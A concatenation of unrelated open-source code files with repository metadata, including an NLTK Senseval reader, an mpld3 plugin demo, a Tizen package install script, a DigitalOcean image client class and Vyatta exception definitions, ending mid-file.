                if lexelt_num < len(self._lexelts):
                    assert lexelt == self._lexelts[lexelt_num]
                else:
                    self._lexelts.append(lexelt)
                    self._lexelt_starts.append(stream.tell())

            # Start of an instance?
            if line.lstrip().startswith('<instance'):
                assert instance_lines == []
                in_instance = True

            # Body of an instance?
            if in_instance:
                instance_lines.append(line)

            # End of an instance?  Repair and parse the accumulated block.
            if line.lstrip().startswith('</instance'):
                xml_block = '\n'.join(instance_lines)
                xml_block = _fixXML(xml_block)
                inst = ElementTree.fromstring(xml_block)
                return [self._parse_instance(inst, lexelt)]

    def _parse_instance(self, instance, lexelt):
        """Convert a parsed <instance> element into a SensevalInstance."""
        senses = []
        context = []
        position = None
        for child in instance:
            if child.tag == 'answer':
                senses.append(child.attrib['senseid'])
            elif child.tag == 'context':
                context += self._word_tokenizer.tokenize(child.text)
                for cword in child:
                    if cword.tag == 'compound':
                        cword = cword[0]  # is this ok to do?
                    if cword.tag == 'head':
                        # Some sanity checks:
                        assert position is None, 'head specified twice'
                        assert cword.text.strip() or len(cword)==1
                        assert not (cword.text.strip() and len(cword)==1)
                        # Record the position of the head:
                        position = len(context)
                        # Add on the head word itself:
                        if cword.text.strip():
                            context.append(cword.text.strip())
                        elif cword[0].tag == 'wf':
                            context.append((cword[0].text,
                                            cword[0].attrib['pos']))
                            if cword[0].tail:
                                context += self._word_tokenizer.tokenize(
                                    cword[0].tail)
                        else:
                            assert False, 'expected CDATA or wf in <head>'
                    elif cword.tag == 'wf':
                        context.append((cword.text, cword.attrib['pos']))
                    elif cword.tag == 's':
                        pass  # Sentence boundary marker.
                    else:
                        print('ACK', cword.tag)
                        assert False, 'expected CDATA or <wf> or <head>'
                    if cword.tail:
                        context += self._word_tokenizer.tokenize(cword.tail)
            else:
                assert False, 'unexpected tag %s' % child.tag
        return SensevalInstance(lexelt, position, context, senses)
def _fixXML(text):
"""
Fix the various issues with Senseval pseudo-XML.
"""
# <~> or <^> => ~ or ^
text = re.sub(r'<([~\^])>', r'\1', text)
# fix lone &
text = re.sub(r'(\s+)\&(\s+)', r'\1&\2', text)
# fix """
text = re.sub(r'"""', '\'"\'', text)
# fix <s snum=dd> => <s snum="dd"/>
text = re.sub(r'(<[^<]*snum=)([^">]+)>', r'\1"\2"/>', text)
# fix foreign word tag
text = re.sub(r'<\&frasl>\s*<p[^>]*>', 'FRASL', text)
# remove <&I .>
text = re.sub(r'<\&I[^>]*>', '', text)
# fix <{word}>
text = re.sub(r'<{([^}]+)}>', r'\1', text)
# remove <@>, <p>, </p>
text = re.sub(r'<(@|/?p)>', r'', text)
# remove <&M .> and <&T .> and <&Ms .>
text = re.sub(r'<&\w+ \.>', r'', text)
# remove <!DOCTYPE... > lines
text = re.sub(r'<!DOCTYPE[^>]*>', r'', text)
# remove <[hi]> and <[/p]> etc
text = re.sub(r'<\[\/?[^>]+\]*>', r'', text)
# take the thing out of the brackets: <…>
text = re.sub(r'<(\&\w+;)>', r'\1', text)
# and remove the & for those patterns that aren't regular XML
text = re.sub(r'&(?!amp|gt|lt|apos|quot)', r'', text)
# fix 'abc <p="foo"/>' style tags - now <wf pos="foo">abc</wf>
text = re.sub(r'[ \t]*([^<>\s]+?)[ \t]*<p="([^"]*"?)"/>',
r' <wf pos="\2">\1</wf>', text)
text = re.sub(r'\s*"\s*<p=\'"\'/>', " <wf pos='\"'>\"</wf>", text)
return text
| {
"content_hash": "1a6e84b3f4a3c579771079ac07865411",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 78,
"avg_line_length": 39.91752577319588,
"alnum_prop": 0.49393078512396693,
"repo_name": "enriquesanchezb/practica_utad_2016",
"id": "6ac715cf3ad5a38eceb0a835c2fb44d490a5d142",
"size": "8019",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "venv/lib/python2.7/site-packages/nltk/corpus/reader/senseval.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "5785"
},
{
"name": "HTML",
"bytes": "284450"
},
{
"name": "JavaScript",
"bytes": "20876"
},
{
"name": "Python",
"bytes": "6659896"
},
{
"name": "Shell",
"bytes": "3296"
}
],
"symlink_target": ""
} |
"""Test the custom plugin demoed on
http://jakevdp.github.io/blog/2014/01/10/d3-plugins-truly-interactive/
"""
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from mpld3_rewrite import plugins, utils
import jinja2
import json
class LinkedView(plugins.PluginBase):
    """A simple plugin showing how multiple axes can be linked"""

    # Figure-side JavaScript: on mouseover of a scatter point, the companion
    # line is redrawn from that point's precomputed data series.
    JAVASCRIPT = """
    var LinkedViewPlugin = function(fig, prop){
      this.fig = fig;
      this.prop = mpld3.process_props(this, prop, {},
                                      ["idpts", "idline", "data"]);
    }

    LinkedViewPlugin.prototype.draw = function(){
      var pts = mpld3.get_element(this.prop.idpts);
      var line = mpld3.get_element(this.prop.idline);
      var data = this.prop.data;

      function mouseover(d, i){
        line.data = data[i];
        line.elements().transition()
            .attr("d", line.datafunc(line.data))
            .style("stroke", this.style.fill);
      }
      pts.elements().on("mouseover", mouseover);
    };

    mpld3.register_plugin("linkedview", LinkedViewPlugin);
    """

    def __init__(self, points, line, linedata):
        # Line2D artists need the "pts" id suffix; other collections
        # (e.g. scatter's PathCollection) do not.
        if isinstance(points, matplotlib.lines.Line2D):
            suffix = "pts"
        else:
            suffix = None

        self.dict_ = {"type": "linkedview",
                      "idpts": utils.get_id(points, suffix),
                      "idline": utils.get_id(line),
                      "data": linedata}
def main():
    """Build the linked-view demo figure: a scatter of (period, amplitude)
    points whose mouseover redraws the sine curve in the upper axes."""
    fig, ax = plt.subplots(2)

    # scatter periods and amplitudes
    np.random.seed(0)
    P = 0.2 + np.random.random(size=20)
    A = np.random.random(size=20)
    x = np.linspace(0, 10, 100)
    # One precomputed (x, A*sin(x/P)) curve per scatter point.
    data = np.array([[x, Ai * np.sin(x / Pi)]
                     for (Ai, Pi) in zip(A, P)])
    points = ax[1].scatter(P, A, c=P + A,
                           s=200, alpha=0.5)
    ax[1].set_xlabel('Period')
    ax[1].set_ylabel('Amplitude')

    # create the line object (initially flat; updated by the JS plugin)
    lines = ax[0].plot(x, 0 * x, '-w', lw=3, alpha=0.5)
    ax[0].set_ylim(-1, 1)
    ax[0].set_title("Hover over points to see lines")

    # transpose line data and add plugin
    linedata = data.transpose(0, 2, 1).tolist()
    plugins.connect(fig, LinkedView(points, lines[0], linedata))
    return fig
# Render the interactive demo figure when run as a script.
if __name__ == '__main__':
    main()
    plt.show()
| {
"content_hash": "0ea2e4426f99e70cea25985fc461da7f",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 70,
"avg_line_length": 28.9125,
"alnum_prop": 0.5685257241677475,
"repo_name": "mpld3/mpld3_rewrite",
"id": "c51cf3a02f819d841b5325ea5eaa1bc2841a8d14",
"size": "2313",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test_plots/test_custom_plugin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "42908"
},
{
"name": "Python",
"bytes": "62387"
}
],
"symlink_target": ""
} |
from setuptools import setup
from g1.devtools import buildtools
# Package definition for the g1.files distribution.
setup(
    name='g1.files',
    cmdclass={
        # Build a zipapp even when no __main__ entry point is provided.
        'bdist_zipapp': buildtools.make_bdist_zipapp(main_optional=True),
    },
    packages=[
        'g1.files',
    ],
    install_requires=[
        'g1.bases',
    ],
    zip_safe=False,
)
| {
"content_hash": "22279c88ef776f073907502762956cfa",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 73,
"avg_line_length": 17.88235294117647,
"alnum_prop": 0.5921052631578947,
"repo_name": "clchiou/garage",
"id": "bbf09a54081b4a835093dbfb9320e73b64787965",
"size": "304",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/g1/files/setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Cap'n Proto",
"bytes": "6917"
},
{
"name": "HTML",
"bytes": "113"
},
{
"name": "Java",
"bytes": "61027"
},
{
"name": "Python",
"bytes": "1653733"
},
{
"name": "Shell",
"bytes": "6209"
}
],
"symlink_target": ""
} |
from django.conf.urls import url, include
from rest_framework.routers import DefaultRouter
from views import TodoItemViewSet
__author__ = "wangyixiang"
dr = DefaultRouter()
dr.register("item", TodoItemViewSet)
urlpatterns = [
url(r'^', include(dr.urls)),
]
| {
"content_hash": "e9c388bc46a9b543fa7e47604be991e2",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 48,
"avg_line_length": 22,
"alnum_prop": 0.7424242424242424,
"repo_name": "wangyixiang/sstest",
"id": "a807f4380f7fab5586a59e4658cd60862998fc92",
"size": "311",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "todo-django/mydjango/todo_webapi/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "43141"
},
{
"name": "Go",
"bytes": "20020"
},
{
"name": "HTML",
"bytes": "3828"
},
{
"name": "JavaScript",
"bytes": "307920"
},
{
"name": "Nginx",
"bytes": "1449"
},
{
"name": "Python",
"bytes": "6648"
}
],
"symlink_target": ""
} |
import os
import shutil
import glob
import time
import sys
import subprocess
import string
from optparse import OptionParser, make_option
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PKG_NAME = os.path.basename(SCRIPT_DIR)  # package name == directory name
PARAMETERS = None                        # parsed CLI options; set in main()
#XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/5000/dbus/user_bus_socket"
#SRC_DIR = "/home/app/content"
SRC_DIR = "/opt/usr/media"               # media root on the target device
PKG_SRC_DIR = "%s/tct/opt/%s" % (SRC_DIR, PKG_NAME)
def doCMD(cmd):
    """Run *cmd* in a shell, echoing its output line by line.

    :return: tuple ``(exit_code, output_lines)``.
    """
    # Do not need handle timeout in this short script, let tool do it
    print "-->> \"%s\"" % cmd
    output = []
    cmd_return_code = 1
    cmd_proc = subprocess.Popen(
        cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
    while True:
        output_line = cmd_proc.stdout.readline().strip("\r\n")
        cmd_return_code = cmd_proc.poll()
        # poll() stays None while the process runs; stop on EOF + exit.
        if output_line == '' and cmd_return_code != None:
            break
        sys.stdout.write("%s\n" % output_line)
        sys.stdout.flush()
        output.append(output_line)
    return (cmd_return_code, output)
def updateCMD(cmd=None):
    """Wrap pkgcmd invocations so they run as the test user with the
    session-bus environment exported; other commands pass through as-is."""
    if "pkgcmd" not in cmd:
        return cmd
    return "su - %s -c '%s;%s'" % (PARAMETERS.user, XW_ENV, cmd)
def getUSERID():
    """Resolve the numeric uid of the test user on the target device
    (via `sdb shell` or ssh) and return the doCMD() result tuple."""
    if PARAMETERS.mode == "SDB":
        cmd = "sdb -s %s shell id -u %s" % (
            PARAMETERS.device, PARAMETERS.user)
    else:
        cmd = "ssh %s \"id -u %s\"" % (
            PARAMETERS.device, PARAMETERS.user )
    return doCMD(cmd)
def overwriteCopy(src, dest, symlinks=False, ignore=None):
    """Recursively copy *src* into *dest*, overwriting existing entries.

    :param src: source directory path
    :param dest: destination directory (created if missing)
    :param symlinks: when True, recreate symlinks instead of copying targets
    :param ignore: optional shutil-style ignore callable
    """
    # BUGFIX: `stat` was never imported at module level, so the
    # stat.S_IMODE() call below raised NameError (silently swallowed by the
    # except clause) and link modes were never copied.
    import stat
    if not os.path.exists(dest):
        os.makedirs(dest)
    shutil.copystat(src, dest)
    sub_list = os.listdir(src)
    if ignore:
        excl = ignore(src, sub_list)
        sub_list = [x for x in sub_list if x not in excl]
    for i_sub in sub_list:
        s_path = os.path.join(src, i_sub)
        d_path = os.path.join(dest, i_sub)
        if symlinks and os.path.islink(s_path):
            if os.path.lexists(d_path):
                os.remove(d_path)
            os.symlink(os.readlink(s_path), d_path)
            try:
                # os.lchmod is not available on every platform; best-effort.
                s_path_s = os.lstat(s_path)
                s_path_mode = stat.S_IMODE(s_path_s.st_mode)
                os.lchmod(d_path, s_path_mode)
            except Exception:
                pass
        elif os.path.isdir(s_path):
            overwriteCopy(s_path, d_path, symlinks, ignore)
        else:
            shutil.copy2(s_path, d_path)
def doCopy(src_item=None, dest_item=None):
    """Copy a file or directory tree to *dest_item*, creating any missing
    parent directories for a file copy.

    :return: True on success, False on any error.
    """
    try:
        if os.path.isdir(src_item):
            overwriteCopy(src_item, dest_item, symlinks=True)
        else:
            if not os.path.exists(os.path.dirname(dest_item)):
                # BUGFIX: this branch used an undefined LOG object; the
                # resulting NameError was swallowed below, so copies into a
                # missing directory always "failed" without creating it.
                print("Create non-existent dir: %s" %
                      os.path.dirname(dest_item))
                os.makedirs(os.path.dirname(dest_item))
            shutil.copy2(src_item, dest_item)
    except Exception:
        return False
    return True
def getPKGID(pkg_name=None):
    """Look up the package id for *pkg_name* in `pkgcmd -l` output.

    :return: the package id string, or None when not found / on error.
    """
    if PARAMETERS.mode == "SDB":
        cmd = "sdb -s %s shell %s" % (
            PARAMETERS.device, updateCMD('pkgcmd -l'))
    else:
        cmd = "ssh %s \"%s\"" % (
            PARAMETERS.device, updateCMD('pkgcmd -l'))
    (return_code, output) = doCMD(cmd)
    if return_code != 0:
        return None
    test_pkg_id = None
    for line in output:
        pkg_infos = line.split()
        # A package row has at least 6 whitespace-separated fields
        # (name is field 5, id is field 3).  The old `== 4` check let a
        # 5-field line raise IndexError below; skip anything too short.
        if len(pkg_infos) < 6:
            continue
        name = pkg_infos[5]
        name = name.lstrip('[').rstrip(']')
        # print() call form works identically on Python 2 and 3 here.
        print("name is: %s" % name)
        if pkg_name == name:
            test_pkg_id = pkg_infos[3]
            test_pkg_id = test_pkg_id.lstrip('[').rstrip(']')
            print(test_pkg_id)
            break
    return test_pkg_id
def doRemoteCMD(cmd=None):
    """Run *cmd* on the target device through sdb shell or ssh."""
    if PARAMETERS.mode == "SDB":
        full_cmd = "sdb -s %s shell %s" % (PARAMETERS.device, updateCMD(cmd))
    else:
        full_cmd = "ssh %s \"%s\"" % (PARAMETERS.device, updateCMD(cmd))
    return doCMD(full_cmd)
def doRemoteCopy(src=None, dest=None):
    """Push *src* to *dest* on the device (sdb push / scp) and sync.

    :return: True on success, False on failure.

    BUGFIX: the original returned True when the copy FAILED and False when
    it succeeded, the opposite of doCopy()'s convention and of the intended
    ``if not doRemoteCopy(...): action_status = False`` call sites.
    """
    if PARAMETERS.mode == "SDB":
        cmd_prefix = "sdb -s %s push" % PARAMETERS.device
        cmd = "%s %s %s" % (cmd_prefix, src, dest)
    else:
        cmd = "scp -r %s %s:/%s" % (src, PARAMETERS.device, dest)
    (return_code, output) = doCMD(cmd)
    doRemoteCMD("sync")
    return return_code == 0
def uninstPKGs():
    """Uninstall every .wgt test package found under SCRIPT_DIR and remove
    the pushed payload directory from the device.

    :return: True when every step succeeded, False otherwise.
    """
    action_status = True
    for root, dirs, files in os.walk(SCRIPT_DIR):
        # mediasrc directories hold media fixtures, not installable widgets.
        if root.endswith("mediasrc"):
            continue
        for file in files:
            if file.endswith(".wgt"):
                # Widget file name (without extension) maps to the package
                # name used by pkgcmd.
                pkg_id = getPKGID(os.path.basename(os.path.splitext(file)[0]))
                if not pkg_id:
                    action_status = False
                    continue
                (return_code, output) = doRemoteCMD(
                    "pkgcmd -u -t wgt -q -n %s" % pkg_id)
                for line in output:
                    if "Failure" in line:
                        action_status = False
                        break

    # Clean up the pushed test payload on the device.
    (return_code, output) = doRemoteCMD(
        "rm -rf %s" % PKG_SRC_DIR)
    if return_code != 0:
        action_status = False
    return action_status
def instPKGs():
    # NOTE(review): the whole former body is neutralised by being wrapped in
    # the triple-quoted string below, so this function does nothing and
    # returns None.  main() treats that falsy result as a failure and exits
    # with status 1, so `-i` can never succeed as written -- confirm whether
    # this is intentional before relying on the install path.
    """ action_status = True
    (return_code, output) = doCMD(
        "mkdir -p %s" % PKG_SRC_DIR)
    if return_code != 0:
        action_status = False
    # Do some special copy/delete... steps
    '''
    (return_code, output) = doRemoteCMD(
        "mkdir -p %s/tests" % PKG_SRC_DIR)
    if return_code != 0:
        action_status = False
    if not doRemoteCopy("specname/tests", "%s/tests" % PKG_SRC_DIR):
        action_status = False
    '''
    for item in glob.glob("%s/*" % SCRIPT_DIR):
        if item.endswith("inst.py"):
            continue
        else:
            item_name = os.path.basename(item)
            if not doCopy(item, "%s/%s" % (PKG_SRC_DIR, item_name)):
                action_status = False
    print "Package push to host /opt/usr/media/tct/ successfully!"
    return action_status
    """
def main():
    """Parse options, auto-detect the device and DBus environment, then
    install (-i) or uninstall (-u) the test packages.  Exits non-zero on
    any failure."""
    try:
        usage = "usage: inst.py -i"
        opts_parser = OptionParser(usage=usage)
        opts_parser.add_option(
            "-m", dest="mode", action="store", help="Specify mode")
        opts_parser.add_option(
            "-s", dest="device", action="store", help="Specify device")
        opts_parser.add_option(
            "-i", dest="binstpkg", action="store_true", help="Install package")
        opts_parser.add_option(
            "-u", dest="buninstpkg", action="store_true", help="Uninstall package")
        opts_parser.add_option(
            "-a", dest="user", action="store", help="User name")
        global PARAMETERS
        (PARAMETERS, args) = opts_parser.parse_args()
    except Exception, e:
        print "Got wrong option: %s, exit ..." % e
        sys.exit(1)

    # Default user/mode when not given on the command line.
    if not PARAMETERS.user:
        PARAMETERS.user = "app"
    if not PARAMETERS.mode:
        PARAMETERS.mode = "SDB"

    if PARAMETERS.mode == "SDB":
        # Pick the first attached sdb device when none was specified.
        if not PARAMETERS.device:
            (return_code, output) = doCMD("sdb devices")
            for line in output:
                if str.find(line, "\tdevice") != -1:
                    PARAMETERS.device = line.split("\t")[0]
                    break
    else:
        PARAMETERS.mode = "SSH"

    if not PARAMETERS.device:
        print "No device provided"
        sys.exit(1)

    # Resolve the test user's uid to build the session DBus address used by
    # updateCMD() when wrapping pkgcmd calls.
    user_info = getUSERID()
    re_code = user_info[0]
    if re_code == 0 :
        global XW_ENV
        userid = user_info[1][0]
        XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/%s/dbus/user_bus_socket"%str(userid)
    else:
        print "[Error] cmd commands error : %s"%str(user_info[1])
        sys.exit(1)

    if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
        print "-i and -u are conflict"
        sys.exit(1)

    if PARAMETERS.buninstpkg:
        if not uninstPKGs():
            sys.exit(1)
    else:
        if not instPKGs():
            sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
| {
"content_hash": "da1c03da52c0a977550f785d6b278f9d",
"timestamp": "",
"source": "github",
"line_count": 266,
"max_line_length": 106,
"avg_line_length": 30.13533834586466,
"alnum_prop": 0.5474051896207585,
"repo_name": "yugang/crosswalk-test-suite",
"id": "4579cdf531239379c11addb00031833b071b33fc",
"size": "8039",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wrt/wrt-manifest-tizen-tests/inst.wgt.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "3495"
},
{
"name": "CSS",
"bytes": "1694855"
},
{
"name": "Erlang",
"bytes": "2850"
},
{
"name": "Java",
"bytes": "155590"
},
{
"name": "JavaScript",
"bytes": "32256550"
},
{
"name": "PHP",
"bytes": "43783"
},
{
"name": "Perl",
"bytes": "1696"
},
{
"name": "Python",
"bytes": "4215706"
},
{
"name": "Shell",
"bytes": "638387"
},
{
"name": "XSLT",
"bytes": "2143471"
}
],
"symlink_target": ""
} |
from .base import Actionable, ResourceWithID, fromISO8601
class Image(Actionable, ResourceWithID):
    """
    An OS image that droplets can be created from or rebuilt with.

    New images are produced via :meth:`Droplet.snapshot`, and backups are
    generated automatically for droplets that enable them.  Existing images
    can be fetched with :meth:`doapi.fetch_image`,
    :meth:`doapi.fetch_all_images`, and related methods.

    The DigitalOcean API specifies the following fields for image objects:

    :var id: a unique identifier for the image
    :vartype id: int

    :var created_at: date & time of the image's creation
    :vartype created_at: datetime.datetime

    :var distribution: the base Linux distribution used for the image
    :vartype distribution: string

    :var min_disk_size: the minimum ``disk`` size (in gigabytes) a droplet
        needs in order to use the image
    :vartype min_disk_size: number

    :var name: a human-readable name for the image
    :vartype name: string

    :var public: `True` if the image is available to all accounts, `False`
        if it is only accessible from your account
    :vartype public: bool

    :var regions: the slugs of the regions in which the image is available
    :vartype regions: list of strings

    :var size_gigabytes: the size of the image in gigabytes
    :vartype size_gigabytes: number

    :var slug: the unique slug identifier for the image (only defined for
        public images)
    :vartype slug: string or `None`

    :var type: the type of the image: ``"snapshot"`` or ``"backup"``
    :vartype type: string
    """

    def __init__(self, state=None, **extra):
        super(Image, self).__init__(state, **extra)
        # Eagerly parse the ISO 8601 creation timestamp (if present).
        self.created_at = fromISO8601(self.get('created_at'))

    def __str__(self):
        """
        Convert the image to its slug representation.  An `AttributeError`
        is raised when the image does not have a slug.
        """
        if self.get("slug") is None:
            raise AttributeError("{0!r} object has no attribute 'slug'"\
                                 .format(self._class()))
        return self.slug

    @property
    def url(self):
        """ The endpoint for general operations on the individual image """
        endpoint = '/v2/images/' + str(self.id)
        return self._url(endpoint)

    def fetch(self):
        """
        Fetch & return a new `Image` object representing the image's current
        state

        :rtype: Image
        :raises DOAPIError: if the API endpoint replies with an error (e.g.,
            if the image no longer exists)
        """
        mgr = self.doapi_manager
        payload = mgr.request(self.url)["image"]
        return mgr._image(payload)

    def update_image(self, name):
        # The `_image` is to avoid conflicts with MutableMapping.update.
        """
        Update (i.e., rename) the image

        :param str name: the new name for the image
        :return: an updated `Image` object
        :rtype: Image
        :raises DOAPIError: if the API endpoint replies with an error
        """
        mgr = self.doapi_manager
        payload = mgr.request(self.url, method='PUT',
                              data={"name": name})["image"]
        return mgr._image(payload)

    def delete(self):
        """
        Delete the image

        :return: `None`
        :raises DOAPIError: if the API endpoint replies with an error
        """
        self.doapi_manager.request(self.url, method='DELETE')

    def transfer(self, region):
        """
        Transfer the image to another region

        :param region: the slug or `Region` object representing the region
            to which to transfer the image
        :type region: string or `Region`
        :return: an `Action` representing the in-progress operation on the
            image
        :rtype: Action
        :raises DOAPIError: if the API endpoint replies with an error
        """
        return self.act(type='transfer', region=region)

    def convert(self):
        """
        Convert the image to a snapshot

        :return: an `Action` representing the in-progress operation on the
            image
        :rtype: Action
        :raises DOAPIError: if the API endpoint replies with an error
        """
        return self.act(type='convert')
| {
"content_hash": "e930a021fe541a57601512d6f7a6c60b",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 79,
"avg_line_length": 34.31496062992126,
"alnum_prop": 0.6195502524093621,
"repo_name": "jwodder/doapi",
"id": "958aff754bdaac293204d1867f3bf6ef5e332b5e",
"size": "4358",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "doapi/image.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "188382"
}
],
"symlink_target": ""
} |
from neutron.common import exceptions
class CorruptedSystemError(exceptions.NeutronException):
    """The system contains conflicting configuration."""
    message = _('System contain conflicts: %(description)s.')


class VRouterConnectFailure(exceptions.NeutronException):
    """Couldn't connect to instance."""
    message = _("Couldn't connect to Vyatta vRouter [%(ip_address)s].")


class VRouterOperationError(exceptions.NeutronException):
    """Internal Vyatta vRouter exception."""
    message = _("Internal Vyatta vRouter exception [%(ip_address)s]:"
                "%(reason)s.")


class InvalidVRouterInstance(exceptions.NeutronException):
    """Couldn't find the vrouter instance."""
    message = _("Couldn't find Vyatta vRouter instance %(router_id)s.")


class InvalidInstanceConfiguration(exceptions.NeutronException):
    """Invalid vRouter VM instance configuration."""
    message = _("Invalid Vyatta vRouter configuration: %(cause)s.")


class InvalidParameter(exceptions.NeutronException):
    """Invalid configuration parameter."""
    message = _("Invalid Parameter: %(cause)s.")


class InvalidResponseFormat(exceptions.NeutronException):
    """The vRouter API returned a response that could not be parsed."""
    message = _('Unparsable vRouter API response: %(details)s')


class WaitTimeoutError(exceptions.NeutronException):
    """Timeout error after waiting for Vyatta vRouter VM creation."""
    message = _("Timeout waiting for Vyatta vRouter instance creation.")


class InstanceSpawnError(exceptions.NeutronException):
    """vRouter VM instance spawning error."""
    message = _("Failed to spawn Vyatta vRouter VM instance.")


class InvalidL3AgentStateError(exceptions.NeutronException):
    """The L3 agent is in an unexpected state."""
    message = _('Invalid L3 agent state: %(description)s')


class InvalidVPNServiceError(exceptions.NeutronException):
    """VPN service data is invalid or incomplete."""
    message = _('Invalid or incomplete VPN service data')


class VPNResourceMappingNotFound(exceptions.NotFound):
    """No mapping exists for the requested VPN resource key."""
    message = _('There is no VPN resource mapping for %(kind)s key=%(key)s')


class ResourceNotFound(exceptions.NotFound):
    """Generic not-found error for vRouter resources."""
    message = _('Resource not found.')


class TableCellNotFound(exceptions.NotFound):
    """A vRouter status-table lookup found no matching cell."""
    message = _('There is no cell in vRouter status table.')


class DvrOrHaRouterNotSupported(exceptions.NeutronException):
    """DVR/HA router types are not supported by this driver."""
    message = _('DVR or HA routers are not supported.')
| {
"content_hash": "84a7bd037ea967ffe1198ee138138b72",
"timestamp": "",
"source": "github",
"line_count": 69,
"max_line_length": 76,
"avg_line_length": 32.30434782608695,
"alnum_prop": 0.7379991027366533,
"repo_name": "rmadapur/networking-brocade",
"id": "f7765cdf75e545d331bb968dde5df6d9ca9f04f5",
"size": "2880",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "networking_brocade/vyatta/common/exceptions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "321827"
}
],
"symlink_target": ""
} |
from timeit import default_timer
class instrument(object):
def __init__(self):
self.lap_stack = []
self.guard_stack = []
self.lap_table = {}
def start(self):
self.start_time = default_timer()
def stop(self):
self.end_time = default_timer()
def lap(self, func=None, id=None):
""" Can be used as a decorator to time a function or in the
'with' statement as a guard """
if func:
if id is None:
id = "%s.%s" % (func.__module__, func.__name__)
def wrapper(*arg, **kw):
self._start_lap(id)
result = func(*arg, **kw)
self._stop_lap(id)
return result
return wrapper
else:
if id is None: raise "ID must not be None !"
self.guard_stack.append(id)
return self
def __enter__(self):
self._start_lap(self.guard_stack[-1])
return self
def __exit__(self, *args):
self._stop_lap(self.guard_stack[-1])
self.guard_stack.pop()
return False
def _start_lap(self, lap_id):
self.lap_stack.append((default_timer(), lap_id))
def _stop_lap(self, lap_id):
end_time = default_timer()
start_time, start_lap_id = self.lap_stack.pop()
if lap_id != start_lap_id:
raise KeyError("Invalid lap_id: %s" % start_lap_id)
self.lap_table.setdefault(lap_id, []).append(end_time - start_time)
def print_results(self):
def calc_stats(lap_entries):
t_spent = sum(lap_entries, 0.0)
percent = (t_spent/total_time) * 100
count = len(lap_entries)
average = t_spent / count
return (t_spent, percent, count, average)
total_time = (self.end_time - self.start_time)
print "Total time: ", total_time
print "Laps..."
lap_stats = [(k, calc_stats(v)) for k,v in self.lap_table.iteritems()]
lap_stats.sort(lambda a,b: cmp(a[1][0], b[1][0]))
for k, v in lap_stats:
t_spent, percent, count, average = v
print "%30.30s: %7.3f (%5.2f), %5.2d, %7.3f" % (k, t_spent, percent, count, average)
if __name__=="__main__":
import time
inst = instrument()
@inst.lap
def waste_one_sec():
time.sleep(1)
inst.start()
time.sleep(1)
waste_one_sec()
time.sleep(1)
for i in range(3):
waste_one_sec()
time.sleep(1)
for i in range(3):
with inst.lap(id="my_code_block"):
time.sleep(1)
inst.stop()
inst.print_results()
| {
"content_hash": "29edf7e8f81ad25d40f9cae24972119b",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 96,
"avg_line_length": 30.136363636363637,
"alnum_prop": 0.5211161387631976,
"repo_name": "inbloom/secure-data-service",
"id": "4fffdb44d806e1577b9430ea8b3d83b6308c721a",
"size": "2652",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "POC/aggregation/mongo/instrumentation.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "AspectJ",
"bytes": "9748"
},
{
"name": "CSS",
"bytes": "112888"
},
{
"name": "Clojure",
"bytes": "37861"
},
{
"name": "CoffeeScript",
"bytes": "18305"
},
{
"name": "Groovy",
"bytes": "26568"
},
{
"name": "Java",
"bytes": "12115410"
},
{
"name": "JavaScript",
"bytes": "390822"
},
{
"name": "Objective-C",
"bytes": "490386"
},
{
"name": "Python",
"bytes": "34255"
},
{
"name": "Ruby",
"bytes": "2543748"
},
{
"name": "Shell",
"bytes": "111267"
},
{
"name": "XSLT",
"bytes": "144746"
}
],
"symlink_target": ""
} |
"""Phylogenetics command line tool wrappers."""
__docformat__ = "restructuredtext en"
from _Phyml import PhymlCommandline
from _Raxml import RaxmlCommandline
# Make this explicit, then they show up in the API docs
__all__ = ["PhymlCommandline",
           "RaxmlCommandline",
           ]
| {
"content_hash": "cf29fe074e180a7c89bebf5b159f6154",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 54,
"avg_line_length": 29,
"alnum_prop": 0.696551724137931,
"repo_name": "bryback/quickseq",
"id": "01dd11c9268e45c7c6b27802d42ea41101487e17",
"size": "515",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "genescript/Bio/Phylo/Applications/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "272327"
},
{
"name": "JavaScript",
"bytes": "61962"
},
{
"name": "Python",
"bytes": "4049558"
}
],
"symlink_target": ""
} |
class CommandError(Exception): pass       # generic command failure
class VcsCommandError(Exception): pass    # a version-control command failed
class NoVcsError(Exception): pass         # no version-control system found
class ShellCommandError(Exception):
    """Raised when a shell command fails; carries the command's output."""

    def __init__(self, message, output, *args, **kwargs):
        super(ShellCommandError, self).__init__(message, *args, **kwargs)
        self.output = output

    def __str__(self):
        base = super(ShellCommandError, self).__str__()
